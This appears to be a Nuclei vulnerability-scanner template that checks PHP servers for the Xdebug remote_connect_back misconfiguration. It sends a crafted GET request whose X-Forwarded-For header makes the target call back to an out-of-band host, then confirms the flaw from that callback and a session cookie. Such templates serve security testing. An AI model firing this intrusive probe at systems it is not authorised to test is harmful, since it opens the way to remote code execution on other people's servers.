id: php-xdebug-rce

info:
  name: Xdebug remote code execution via xdebug.remote_connect_back
  author: pwnhxl
  severity: high
  description: |
    The XDebug extension <= v2.6.0 for PHP is designed to expand the debugging capabilities of developers, including the ability to perform remote debugging. A misconfigured server, with ‘xdebug.remote_connect_back’ enabled, exposed to the internet could allow an unauthenticated remote attacker to trigger a debugging session using any IP via a simple web request. With a remote debugging session established, the attacker effectively has remote code execution (RCE) capabilities with which to establish persistence, exfiltrate data, or launch further attacks against the system or network.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce
    - https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/
    - https://paper.seebug.org/397/
    - https://github.com/D3Ext/XDEBUG-Exploit
  metadata:
    max-request: 1
  tags: oast,rce,vulhub,php,debug,xdebug,intrusive

http:
  - raw:
      - |
        GET /?XDEBUG_SESSION_START={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: {{interactsh-url}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: header
        words:
          - 'Set-Cookie: XDEBUG_SESSION={{randstr}}'

      - type: status
        status:
          - 200

# digest: 4a0a00473045022060524c10c10e17d2c4a8d20858d9437f9dd40c4bf5fd829623777541978ed368022100d1a127e5cf2e01e07a030b73824efa3fa8b35f4f38304c0d620717b379d59a22:922c64590222798bb761d5b6d8e72950